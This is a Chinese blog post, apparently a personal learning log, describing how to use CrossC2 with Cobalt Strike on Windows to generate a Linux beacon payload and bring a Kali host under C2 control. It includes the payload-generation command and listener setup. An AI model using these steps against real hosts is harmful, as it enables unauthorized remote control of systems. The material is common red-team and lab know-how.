CobaltStrike在Windows环境上线Linux主机

查阅了很多教程都没有发现纯Windows下面直接上线LINUX主机的方法,都是完全拷贝到Linux上面命令生成,这里记录一下本人的学习历程,大佬请飘过。

首先下载CrossC2,项目地址:GitHub - gloxec/CrossC2: generate CobaltStrike's cross-platform payload

在9天前更新过(今天2021年11月11日),下载后直接加载CS,成功后会有一个标题栏:

 然后Windows下面启用CS:

创建监听器,这里的第一个坑来了:如果用默认443会创建失败,提示JAVA VM占用,用4433也会失败,结果我这里用了6666成功了: 

然后就是生成客户端了,好多都是在Linux下面生成的,现在可以在Windows下面直接生成,GitHub上面下载Windows的程序:

 然后解压缩会有三个文件:

下面就是生成客户端文件了,把CS根路径下面的: .cobaltstrike.beacon_keys文件复制到与genCrossC2.win.exe路径下面:

在CMD环境中输入命令: 

 genCrossC2.Win 192.168.1.100 6666 null null Linux x64 c2test

其中IP地址是CS监听器的地址,端口为监听器的端口,X64为Linux版本,c2test为要生成文件的名字,回车就能成功生成:

上传到Linux中运行,这里使用的是KALI:

 

在CS中看到Linux上线:

 

 右键可以进行相关操作,这里为文件查看:

 这里写这边文章是看了很多文章都是在Linux下面操作并没有在Windows下面成功复现的文章,也欢迎各位大佬一起交流学习。

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值